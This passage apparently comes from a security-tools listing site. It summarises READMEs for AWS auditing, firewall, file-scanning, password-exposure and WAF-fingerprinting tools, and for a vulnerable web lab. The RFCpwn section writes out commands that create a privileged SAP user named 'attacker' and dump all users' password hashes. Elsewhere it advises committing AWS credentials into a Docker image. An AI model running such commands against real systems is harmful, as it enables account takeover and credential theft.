  eventName LIKE '%Bucket%'
ORDER BY 1

Best Practices
Keep things simple and follow the principle of least privilege to reduce the chance of mistakes.
  • Strictly limit who can perform bucket-related operations
  • Avoid mixing objects with different permissions in the same bucket (use a bucket policy to enforce this)
  • Don’t specify public read permissions on a bucket level (no GetObject in bucket policy)
  • Monitor configuration frequently for changes

Bucket Policies
Only private uploads
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObjectAcl",
      "Resource": "arn:aws:s3:::my-bucket/*"
    }
  ]
}

Notes
The set-policy, enable-logging, enable-versioning, and enable-default-encryption commands are provided for convenience. We recommend Terraform for managing your buckets.
resource "aws_s3_bucket" "my_bucket" {
  bucket = "my-bucket"
  acl    = "private"

  logging {
    target_bucket = "my-s3-logs"
    target_prefix = "my-bucket/"
  }

  versioning {
    enabled = true
  }
}

Upgrading
Run:
pip install s3tk --upgrade
To use master, run:
pip install git+https://github.com/ankane/s3tk.git --upgrade

Docker
Run:
docker run -it ankane/s3tk aws configure
Commit your credentials:
docker commit $(docker ps -l -q) my-s3tk
And run:
docker run -it my-s3tk s3tk scan

History
View the changelog


WindowsFirewallRuleset - Windows Firewall Ruleset Powershell Scripts


About WindowsFirewallRuleset
  1. Rule group
  2. Traffic direction
  3. IP version (IPv4 / IPv6)
  4. Further sorted according to programs and services
  • such as for example:
  1. ICMP traffic
  2. Browser rules
  3. rules for Windows system
  4. Store apps
  5. Windows services
  6. Microsoft programs
  7. 3rd party programs
  8. broadcast traffic
  9. multicast traffic
  10. and the list goes on...
  • You can choose which rules you want, and apply only those or apply them all with a single command to your firewall.
  • All the rules are loaded into Local Group Policy, giving you full power over the default Windows firewall.

This project "WindowsFirewallRuleset" is licensed under MIT license.
Subproject Indented.Net.IP (3rd party code) located in "Indented.Net.IP" subfolder is licensed under ISC license.
Subproject VSSetup (3rd party code) located in "VSSetup" subfolder is licensed under MIT license.
License, Copyright notices and all material of subprojects is in their own folder.
License and Copyright notices for this project is in project root folder
For more info see respective licences:
WindowsFirewallRuleset\LICENSE
Indented.Net.IP\LICENSE
VSSetup\LICENSE.txt

Minimum system requirements
  1. Windows 10 Pro/Enterprise
  2. Windows Powershell 5.1 Download Powershell
  3. Git (Optional) Download Git
Note that Powershell is built into Windows by default, but on some old systems you will probably need to install or update it.
To be able to apply rules to older systems such as Windows 7, edit FirewallModule.psm1 and add a new variable that defines your system version.
New-Variable -Name Platform -Option Constant -Scope Global -Value "10.0+" is defined to target Windows 10 and above by default for all rules; for Windows 7, for example, define a new variable that looks like this:
New-Variable -Name PlatformWin7 -Option Constant -Scope Global -Value "6.1"
Next, open the individual ruleset scripts and take a look at which rules you want to be loaded into your firewall,
then simply replace -Platform $Platform with -Platform $PlatformWin7 for each rule you want.
In VS Code, for example, you would simply search (CTRL + F) in each script and replace all instances. Very simple.
If you miss something you can delete, add or modify rules in GPO later.
Note that if you define your platform globally (i.e. $Platform = "6.1") instead of making your own variable, just replacing the string but not excluding unrelated rules, most of the rules will work, but rules for Store Apps, for example, will fail to load.
Also, rules for programs and services that were introduced in Windows 10 will most likely be applied but redundant.
What this means is: just edit the GPO later to refine your imports if you go that route.
In any case, new system or old, know that Home editions of Windows do not have GPO (Local Group Policy), therefore it is not possible to make use of this project on them.

Step by step quick start
WARNING:
  • These steps are designed for those who don't feel comfortable with git, Powershell or Local Group Policy.
  • You may lose internet connectivity for some of your programs or, in rare cases, even lose internet connectivity completely. If that happens, you can run ResetFirewall.ps1 to reset the firewall to its previous state.
  • Inside the Readme folder there is a ResetFirewall.md, a guide on how to do it manually, by hand, if for some reason you're unable to run the script, or the script does not solve your problems.
  • Also note that your current/existing rules will not be deleted unless you have rules in GPO whose group name interferes with group names from this ruleset.
  • To be 100% sure, please export your current GPO rules first (if you don't know how to do that, then ignore this: you don't have GPO rules).
STEPS:
  1. Right click on the Task bar and select Taskbar settings
  2. Toggle on Replace Command Prompt with Windows Powershell in the menu when I right click the start button
  3. Right click on Start button in Windows system
  4. Click Windows Powershell (Administrator) to open Powershell as Administrator (Input Admin password if needed)
  5. Type: (or copy paste commands and hit enter) Get-ExecutionPolicy and remember what the output is.
  6. Type: Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force
  7. Type: cd C:\
  8. Type: git clone git@github.com:metablaster/WindowsFirewallRuleset.git
  9. Type: cd WindowsFirewallRuleset
  10. Rules for programs such as internet browsers, Visual Studio etc. depend on installation variables.
    Most paths are auto-searched and variables are updated; otherwise you get a warning and a description of how to fix the problem.
  11. Back in the PowerShell console, type: .\SetupFirewall.ps1 and hit enter (you will be asked what kind of rulesets you want).
  12. Follow the prompt output (i.e. hit enter each time to proceed until done); it will take at least 10 minutes of your attention.
  13. If you encounter errors, you have several options, such as ignoring the errors, or fixing the script that produced the error and re-running that script later.
  14. Once execution is done, recall the execution policy from step 5 and restore it, e.g. if the previous policy was "RemoteSigned":
    Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -Force
  15. Now that rules are applied you may need to adjust some of them in Local Group Policy: not all rules are enabled by default, you may want to toggle the default Allow/Block behavior for some rules, and rules for programs which do not exist on your system need to be created additionally.
    See the next sections for more info.

Where are my rules?
Rules are loaded into Local Group Policy; follow the steps below to open Local Group Policy.
  1. Press the Windows key and type: secpol.msc
  2. Right click on secpol.msc and click Run as administrator
  3. Expand node: Windows Defender Firewall with Advanced Security
  4. Expand node: Windows Defender Firewall with Advanced Security - Local Group Policy Object
  5. Click on either the Inbound or Outbound node to view and manage the rules you applied with the PowerShell script.

Applying individual rulesets
If you want to apply only specific rules there are 2 ways to do this:
  1. Execute SetupFirewall.ps1 and hit enter only for the rulesets you want; otherwise type n and hit enter to skip the current ruleset.
  2. Inside PowerShell, navigate to the folder containing the ruleset script you want, and execute that individual PowerShell script.
  3. You may want to run FirewallProfile.ps1 to apply the default firewall behavior, or you can do it manually in GPO.
In either case the script will delete all of the existing rules that match the rule group (if any), and load the rules from the script into Local Group Policy.

Deleting rules
At the moment the easiest way is to select all the rules you want to delete in Local Group Policy, right click and delete.
To revert to your old firewall state, you will need to delete all the rules from GPO, and set all properties to "Not configured" when right clicking on the node Windows Defender Firewall with Advanced Security - Local Group Policy Object.

Manage loaded rules
There are 2 ways to manage your rules:
  1. Using Local Group Policy; this method gives you limited freedom in what you can do with the rules, such as disabling them or changing some attributes.
  2. Editing the PowerShell scripts; this method gives you full control: you can improve the rules, add new ones, or screw them up.
Whatever your setup is, you will surely need to perform additional work such as adding more rules in GPO to allow programs for which rules do not exist, or reconfiguring existing rules.

Contribution or suggestions
Feel free to suggest or contribute new rules, or improvements to existing rules or scripts.
Just make sure you follow the existing code style, as follows:
  1. Note that each rule uses exactly the same order of parameters, split into exactly the same number of lines.
    This is so that when you need to search for something it's easy to see what is where right away.
  2. Provide documentation and an official reference for your rules so that it is easy to verify that these rules do not contain mistakes; for example, for ICMP rules you would provide a link to IANA with the relevant reference document.
  3. If you would like to suggest new rules or improvements to existing ones, but you do not have the skills to upload an update here, please open a new issue here on GitHub and provide details, preferably with documentation.
  4. To contribute rules, it is also important that each rule contains a good description of its purpose: when a user clicks on a rule in the firewall GUI, they want to see what this rule is about and easily conclude whether to enable/disable the rule or allow/block the traffic.
  5. It is also important that a rule is very specific and not generic; that means specifying protocol, IP addresses, ports, system user, interface type and other relevant information.
    For example, just saying "allow TCP outbound port 80" for any address or any user, with no explanation of what this is supposed to allow or block, is not acceptable.

More information and help
Inside the Readme folder you will find very useful information, not only about this project but also general information on how to troubleshoot firewall and network problems, or gather more relevant information.
It may answer some of your questions, so you should go ahead and read it!
By the way, it's recommended you read those documents here on GitHub because of the formatting and screenshots.


AWS Report - Tool For Analyzing Amazon Resources


AWS Report is a tool for analyzing amazon resources.

Features
  • Search IAM users based on creation date
  • Search public buckets
  • Search security groups with an inbound rule for 0.0.0.0/0
  • Search disassociated Elastic IPs
  • Search available (unattached) volumes
  • Search AMIs with public permissions
  • Search detached internet gateways

Install requirements
pip3 install --user -r requirements.txt

Environment variables
IAM_MAX_ACCESS_KEY_AGE: maximum age of IAM access keys in days; the default is 60 days.
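As an added example (my own code, not part of AWS Report), two of the checks from the feature list above, the world-open security group rule and the access-key age limit, written over the dict shapes that boto3's describe_security_groups and list_access_keys return; the sample data is constructed so it runs offline, and the IAM_MAX_ACCESS_KEY_AGE default of 60 days is the one stated on the page.

```python
import os
from datetime import datetime, timedelta, timezone

# Age threshold in days, overridable via the same variable the page documents.
MAX_KEY_AGE_DAYS = int(os.environ.get("IAM_MAX_ACCESS_KEY_AGE", "60"))

# Any rule whose source is one of these CIDRs is open to the whole internet.
WORLD_CIDRS = {"0.0.0.0/0", "::/0"}

# Constructed sample in the shape of ec2.describe_security_groups()["SecurityGroups"].
SAMPLE_SECURITY_GROUPS = [
    {"GroupId": "sg-0000000000000001", "GroupName": "web", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": []}]},
    {"GroupId": "sg-0000000000000002", "GroupName": "admin", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 22, "ToPort": 22,
         "IpRanges": [{"CidrIp": "10.0.0.0/8"}], "Ipv6Ranges": [{"CidrIpv6": "::/0"}]}]},
    {"GroupId": "sg-0000000000000003", "GroupName": "db", "IpPermissions": [
        {"IpProtocol": "tcp", "FromPort": 5432, "ToPort": 5432,
         "IpRanges": [{"CidrIp": "10.0.1.0/24"}], "Ipv6Ranges": []}]},
]


def open_ingress(groups):
    """Return (group_id, protocol, from_port, to_port, cidr) for every inbound
    rule whose IPv4 or IPv6 source range is the whole internet."""
    findings = []
    for group in groups:
        for perm in group.get("IpPermissions", []):
            cidrs = [r["CidrIp"] for r in perm.get("IpRanges", [])]
            cidrs += [r["CidrIpv6"] for r in perm.get("Ipv6Ranges", [])]
            for cidr in cidrs:
                if cidr in WORLD_CIDRS:
                    findings.append((group["GroupId"], perm.get("IpProtocol"),
                                     perm.get("FromPort"), perm.get("ToPort"), cidr))
    return findings


# Constructed sample in the shape of iam.list_access_keys()["AccessKeyMetadata"];
# the key ids are placeholders, and "now" is fixed so the result is reproducible.
NOW = datetime(2020, 3, 1, tzinfo=timezone.utc)
SAMPLE_ACCESS_KEYS = [
    {"UserName": "alice", "AccessKeyId": "AKIA-PLACEHOLDER-1", "Status": "Active",
     "CreateDate": NOW - timedelta(days=10)},
    {"UserName": "bob", "AccessKeyId": "AKIA-PLACEHOLDER-2", "Status": "Active",
     "CreateDate": NOW - timedelta(days=200)},
    {"UserName": "carol", "AccessKeyId": "AKIA-PLACEHOLDER-3", "Status": "Inactive",
     "CreateDate": NOW - timedelta(days=400)},
]


def stale_access_keys(keys, now=NOW, max_age_days=MAX_KEY_AGE_DAYS):
    """Return (user, key_id, age_in_days) for active keys older than the limit.
    Inactive keys are skipped: they cannot be used, so rotation is not urgent."""
    stale = []
    for key in keys:
        if key["Status"] != "Active":
            continue
        age = (now - key["CreateDate"]).days
        if age > max_age_days:
            stale.append((key["UserName"], key["AccessKeyId"], age))
    return stale


if __name__ == "__main__":
    for finding in open_ingress(SAMPLE_SECURITY_GROUPS):
        print("open ingress:", finding)
    for finding in stale_access_keys(SAMPLE_ACCESS_KEYS):
        print("stale access key:", finding)
```

Against a live account the same two functions take the output of `boto3.client("ec2").describe_security_groups()["SecurityGroups"]` and `boto3.client("iam").list_access_keys(UserName=...)["AccessKeyMetadata"]` directly.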

Usage
Usage: aws_report.py [OPTIONS]

Options:
--s3 Search buckets public in s3
--iam Search iam users based on creation date
--sg Search security groups with inbound rule 0.0.0.0
--elasticip Search elastic IP not associated
--volumes Search volumes available
--ami Search AMIs with permission public
--owner TEXT Defines the owner of the resources to be found
--igw Search internet gateways detached
--region TEXT Defines the region of resources
--help Show this message and exit.

Examples
python3 aws_report.py --s3
python3 aws_report.py --iam
python3 aws_report.py --owner 296193067842 --ami

Running in Docker
docker run -it -e AWS_ACCESS_KEY_ID=you-access-key -e AWS_SECRET_ACCESS_KEY=you-secret-key gmdutra/aws-report --s3

Contact
[+]Email     gmdutra.eu@gmail.com
[+]Linkedin linkedin.com/in/gmdutra
[+]Twitter twitter.com/gmdutrax


Tishna - Complete Automated Pentest Framework For Servers, Application Layer To Web Security

Complete automated pentest framework for servers, the application layer and web security.

Interface
  • The software has 62 options with full automation and can be used as a web security Swiss army knife.


Tishna
  • Tishna is web server security penetration software for ultimate security analysis.
  • Kali, Parrot OS, Black Arch, Termux, Android Led TV

Appeared
  • Cyber Space (Computer Security)
  • Terror Security (Computer Security)
  • National Cyber Security Services

Brief Introduction
  • Tishna is useful for banks, private organisations and ethical hacking personnel for legal auditing.
  • It serves as a defensive method to find as much information as possible that could be used for gaining unauthorised access and intrusion.
  • With the emergence of more advanced technology, cybercriminals have also found more ways to get into the systems of many organizations.
  • Tishna software can audit servers and web behaviour.
  • Tishna can perform scanning and enumeration of the target as thoroughly as possible.
  • It's the first step to stopping cyber criminals: securing your servers and web application security.
  • Tishna is false-positive free: when there is something it will show it no matter what, and if there is not, it will give blank results rather than an error.

Kali Installation
  • git clone https://github.com/haroonawanofficial/Tishna.git
  • cd Tishna
  • sudo chmod u+x *.sh
  • ./Kali_Installer.sh
  • Tishna will be integrated as system software
  • Dependencies will be handled automatically
  • Third-party software/dependencies/modules will be handled automatically

Developer


Multiscanner - Modular File Scanning/Analysis Framework


MultiScanner is a file analysis framework that assists the user in evaluating a set of files by automatically running a suite of tools for the user and aggregating the output. Tools can be custom built Python scripts, web APIs, software running on another machine, etc. Tools are incorporated by creating modules that run in the MultiScanner framework.
Modules are designed to be quickly written and easily incorporated into the framework. Currently written and maintained modules are related to malware analytics, but the framework is not limited to that scope. For a list of modules you can look in modules/. Descriptions and config options can be found on the Analysis Modules page.
MultiScanner also supports a distributed workflow for sample storage, analysis, and report viewing. This functionality includes a web interface, a REST API, a distributed file system (GlusterFS), distributed report storage / searching (Elasticsearch), and distributed task management (Celery / RabbitMQ). Please see Architecture for more details.

Usage
MultiScanner can be used as a command-line interface, a Python API, or a distributed system with a web interface. See the documentation for more detailed information on installation and usage.

Command-Line
Install Python (2.7 or 3.4+) if you haven't already.
Then run the following:
$ git clone https://github.com/mitre/multiscanner.git
$ cd multiscanner
$ sudo -HE ./install.sh
$ multiscanner init
This will generate a default configuration for you. Check config.ini to see what modules are enabled. See Configuration for more information.
Now you can scan a file (substituting the actual file you want to scan for <file>):
$ multiscanner <file>
You can run the following to get a list of all of MultiScanner's command-line options:
$ multiscanner --help
Note: If you are not on a RedHat or Debian based Linux distribution, instead of running the install.sh script, install pip (if you haven't already) and run the following:
$ pip install -r requirements.txt

Python API
import multiscanner

# Path to the MultiScanner configuration (config.ini as generated by `multiscanner init`)
filepath = "config.ini"
multiscanner.config_init(filepath)

# Files to scan; substitute the actual files you want to scan for <file>
file_list = ["<file>"]
output = multiscanner.multiscan(file_list)

# Parse the module reports into native Python objects rather than a JSON string
results = multiscanner.parse_reports(output, python=True)

Web Interface
Install the latest versions of Docker and Docker Compose if you haven't already.
$ git clone https://github.com/mitre/multiscanner.git
$ cd multiscanner
$ docker-compose up
You may have to wait a while until all the services are up and running, but then you can use the web interface by going to http://localhost:8000 in your web browser.
Note: this should not be used in production; it is simply an introduction to what a full installation would look like. See here for more details.

Documentation
For more information, see the full documentation on ReadTheDocs.



LKWA - Lesser Known Web Attack Lab


Lesser Known Web Attack Lab is for intermediate pentesters who want to test and practice lesser-known web attacks such as Object Injection, XSSI, PHAR Deserialization, variable variables, etc. Write-ups are welcome.

Installation
Just clone the repository with git clone https://github.com/weev3/LKWA, move it to your web server, and you are good to go.

Current Vulns
  • Blind RCE
  • XSSI
  • PHAR Deserialization
  • PHP Object Injection
  • PHP Object Injection via Cookies
  • PHP Object Injection (Object Reference)
  • SSRF
  • Variables variable


RFCpwn - An Enumeration And Exploitation Toolkit Using RFC Calls To SAP


An SAP enumeration and exploitation toolkit using SAP RFC calls.
This is a toolkit for demonstrating the impact of compromised service accounts.
This PoC is not for use in production environments; there is no guarantee of stability or support.

RFCpwn relies on PyRFC and the libraries provided by SAP; see https://github.com/SAP/PyRFC#installation
usage: RFCpwn.py [-h] [-debug] [-ip IP] [-u Username] [-p Password]
[-c Client] [-s Sysid] [-ping] [-enum] [-usercopy]
[-user USER] [-copy COPY] [-pw PW] [-dump] [-exp]

An Impacket style enumeration and exploitation tool using SAP RFC calls

optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON

Authentication:
-ip IP <targetName or address>
-u Username RFC Users Username
-p Password RFC Users Password
-c Client Client- eg.000
-s Sysid System Number- eg 00
-ping RFC Ping Command

User Abuse:
-enum Use to enumerate a specific user
-usercopy add a Dialog User
-user USER Required for -usercopy and -userenum to specify the user
-copy COPY User to be copied required for -usercopy
-pw PW password of new user for -usercopy

Hash Collection:
-dump Dump hashes use with below
-exp EXPERIMENTAL - Dump BCODE / PASSCODE hashes

Examples
Ping - confirm connectivity
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -ping
Copy a user's rights into a new dialog user. If -copy is not specified, SAP* is used.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -usercopy -user attacker -pw changeme1
Dump hashes from all users. Option -exp adds the experimental BCODE and PASSCODE hashes.
./RFCpwn.py -ip 192.168.200.253 -s 00 -c 000 -u RFCUser -p RFCPass -dump

Demo


Dsync - IDAPython Plugin That Synchronizes Disassembler And Decompiler Views


IDAPython plugin that synchronizes decompiled and disassembled code views.
Please refer to comments in the source code for more details.
Requires IDA 7.2



XposedOrNot - Tool To Search An Aggregated Repository Of Xposed Passwords Comprising Of ~850 Million Real Time Passwords


The XposedOrNot (XoN) tool searches an aggregated repository of xposed passwords comprising ~850 million real-time passwords. Usage of such compromised passwords is detrimental to individual account security.

What are Xposed Passwords?
The main aim of this project is to give a free platform for the general public to check if their password is exposed and compromised.
This massive password collection is an accumulation of real passwords exposed in various data breaches around the world. Passwords are curated from exposed breaches like Collection #1, Yahoo, etc. In addition, passwords are also commonly exposed in "pastes" on pastebin.com; we have taken more than 40,000 such exposures and added them to this huge list.
The collated passwords are hashed with a highly secure hashing algorithm, SHA-3 (Keccak-512), and stored only as a one-way hash for verification. No passwords are stored in plain text, and the process of checking anonymously is explained in detail in our blog post, "850 million passwords for free", which covers the technical and operational controls enforced to enhance the security posture. Feel free to go through it.

How to install?
git clone https://github.com/Viralmaniar/XposedOrNot.git
cd XposedOrNot
pip install -r requirements.txt
python XposedorNot.py

How to interpret the output?
The output is JSON for easy reference. The primary reason for giving JSON output instead of a yes/no is so that it can be further used by people to build on and improve the huge list of real-time exposed passwords aggregated here.
The first element, "anon", is added to all password hashes stored in XoN so that privacy-conscious users can search as well. The second element, "char", is a list of characteristics of the password, which can be used to judge the strength of the password and whether it meets the requirements of the application in question; many websites have password policies based on the number of characters and the mix of letters, numbers and special characters.
The following table explains the characteristics in simple terms:
Characteristic   Description
Digits           Count of numbers
Alphabets        Count of letters
Special chars    Count of special characters
Length           Length of the password
The last element, "count", denotes the number of times this password was observed in the collected xposed data breaches. For a comprehensive list of all xposed websites, please visit Xposed websites-XoN.
Another point to note is the use of Keccak-512 hashing for searching and storing data in XoN. Traditional hashing algorithms like MD5 and SHA1 are deprecated, and considering the enormous number of records exposed, I have gone ahead with Keccak-512 hashes.
Yes, a Keccak-512 hash is 128 hex characters long and it consumes more storage.
Two sample Keccak-512 hashes are given for easy reference:
test - 1e2e9fc2002b002d75198b7503210c05a1baac4560916a3c6d93bcce3a50d7f00fd395bf1647b9abb8d1afcc9c76c289b0c9383ba386a956da4b38934417789e
pass - adf34f3e63a8e0bd2938f3e09ddc161125a031c3c86d06ec59574a5c723e7fdbe04c2c15d9171e05e90a9c822936185f12b9d7384b2bedb02e75c4c5fe89e4d4
Sample output when no matching password hash is found:
 {
"Error": "Not found"
}

Collected Passwords timeline - thanks to DevaOnBreaches
(timeline image)
Detailed list can be seen here: https://xposedornot.com/xposed

Questions?
Twitter: @ManiarViral
LinkedIn: https://au.linkedin.com/in/viralmaniar

Credit
XposedOrNot is maintained by DevaOnBreaches. Big thanks for creating an API for your service. You can connect with him at https://www.devaonbreaches.com/


WAFW00F v2.0 - Allows One To Identify And Fingerprint Web Application Firewall (WAF) Products Protecting A Website


The Web Application Firewall Fingerprinting Tool.
— From Enable Security

How does it work?
To do its magic, WAFW00F does the following:
  • Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions.
  • If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is.
  • If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.
For further details, check out the source code on our main repository.

What does it detect?
WAFW00F can detect a number of firewalls, listed below:
$ wafw00f -l


______
/ \
( W00f! )
\ ____/
,, __ 404 Hack Not Found
|`-.__ / / __ __
/" _/ /_/ \ \ / /
*===* / \ \_/ / 405 Not Allowed
/ )__// \ /
/| / /---` 403 Forbidden
\\/` \ | / _ \
`\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
`_____``-` /_/ \_\

~ WAFW00F : v2.0.0 ~
The Web Application Firewall Fingerprinting Toolkit

[+] Can test for these WAFs:

WAF Name Manufacturer
-------- ------------

ACE XML Gateway Cisco
aeSecure aeSecure
AireeCDN Airee
Airlock Phion/Ergon
Alert Logic Alert Logic
AliYunDun Alibaba Cloud Computing
Anquanbao Anquanbao
AnYu AnYu Technologies
Approach Approach
AppWall Radware
Armor Defense Armor
ArvanCloud ArvanCloud
ASP.NET Generic Microsoft
ASPA Firewall ASPA Engineering Co.
Astra Czar Securities
AzionCDN AzionCDN
Barikode Ethic Ninja
Barracuda Barracuda Networks
Bekchy Faydata Technologies Inc.
Beluga CDN Beluga
BinarySec BinarySec
BitNinja BitNinja
BlockDoS BlockDoS
Bluedon Bluedon IST
CacheWall Varnish
CacheFly CDN CacheFly
Comodo cWatch Comodo CyberSecurity
Chuang Yu Shield Yunaq
Cloudbric Penta Security
Cloudflare Cloudflare Inc.
Cloudfloor Cloudfloor DNS
Cloudfront Amazon
CrawlProtect Jean-Denis Brun
DataPower IBM
DenyALL Rohde & Schwarz Cyber Security
Distil Distil Networks
DOSarrest DOSarrest Internet Security
DotDefender Applicure Technologies
Edgecast Verizon Digital Media
Eisoo Cloud Firewall Eisoo
Expression Engine EllisLab
BIG-IP AppSec Manager F5 Networks
BIG-IP AP Manager F5 Networks
Fastly Fastly CDN
FirePass F5 Networks
FortiWeb Fortinet
Greywizard Grey Wizard
Huawei Cloud Firewall Huawei
HyperGuard Art of Defense
Imunify360 CloudLinux
Incapsula Imperva Inc.
IndusGuard Indusface
Instart DX Instart Logic
ISA Server Microsoft
Jiasule Jiasule
Kona SiteDefender Akamai
KS-WAF KnownSec
KeyCDN KeyCDN
LimeLight CDN LimeLight
LiteSpeed LiteSpeed Technologies
Open-Resty Lua Nginx FLOSS
Oracle Cloud Oracle
Malcare Inactiv
MaxCDN MaxCDN
ModSecurity SpiderLabs
NAXSI NBS Systems
Nemesida PentestIt
NevisProxy AdNovum
NetContinuum Barracuda Networks
NetScaler AppFirewall Citrix Systems
Newdefend NewDefend
NexusGuard Firewall NexusGuard
NinjaFirewall NinTechNet
NullDDoS Protection NullDDoS
NSFocus NSFocus Global Inc.
OnMessage Shield BlackBaud
PerimeterX PerimeterX
PentaWAF Global Network Services
pkSecurity IDS pkSec
PowerCDN PowerCDN
Profense ArmorLogic
Puhui Puhui
Qiniu Qiniu CDN
Reblaze Reblaze
RSFirewall RSJoomla!
Sabre Firewall Sabre
Safe3 Web Firewall Safe3
Safedog SafeDog
Safeline Chaitin Tech.
SecKing SecKing
eEye SecureIIS BeyondTrust
SecuPress WP Security SecuPress
SecureSphere Imperva Inc.
Secure Entry United Security Providers
SEnginx Neusoft
ServerDefender VP Port80 Software
Shield Security One Dollar Plugin
Shadow Daemon Zecure
SiteGround SiteGround
SiteGuard Sakura Inc.
Sitelock TrueShield
SonicWall Dell
UTM Web Protection Sophos
Squarespace Squarespace
SquidProxy IDS SquidProxy
StackPath StackPath
Sucuri CloudProxy Sucuri Inc.
Teros Citrix Systems
Trafficshield F5 Networks
TransIP Web Firewall TransIP
URLScan Microsoft
UEWaf UCloud
Varnish OWASP
Viettel Cloudrity
VirusDie VirusDie LLC
Wallarm Wallarm Inc.
WatchGuard WatchGuard Technologies
WebARX WebARX Security Solutions
WebKnight AQTRONIX
WebLand WebLand
RayWAF WebRay Solutions
WebSEAL IBM
WebTotem WebTotem
West263 CDN West263CDN
Wordfence Defiant
WP Cerber Security Cerber Tech
WTS-WAF WTS
360WangZhanBao 360 Technologies
XLabs Security WAF XLabs
Xuanwudun Xuanwudun
Yundun Yundun
Yunsuo Yunsuo
Yunjiasu Baidu Cloud Computing
YXLink YxLink Technologies
Zenedge Zenedge
ZScaler Accenture

How do I use it?
First, install the tools as described here.
For help you can make use of the --help option. The basic usage is to pass a URL as an argument. Example:
$  wafw00f https://example.org

______
/ \
( W00f! )
\ ____/
,, __ 404 Hack Not Found
|`-.__ / / __ __
/" _/ /_/ \ \ / /
*===* / \ \_/ / 405 Not Allowed
/ )__// \ /
/| / /---` 403 Forbidden
\\/` \ | / _ \
`\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
`_____``-` /_/ \_\

~ WAFW00F : v2.0.0 ~
The Web Application Firewall Fingerprinting Toolkit

[*] Checking https://example.org
[+] The site https://example.org is behind Edgecast (Verizon Digital Media) WAF.
[~] Number of requests: 2

How do I install it?
The following should do the trick:
python setup.py install

Final Words
Questions? Open an issue on the GitHub Issue Tracker or contact me.
Pull requests, ideas and issues are highly welcome. If you wish to see how WAFW00F is being developed, check out the development board.
Some useful links:
Presently being developed and maintained by:

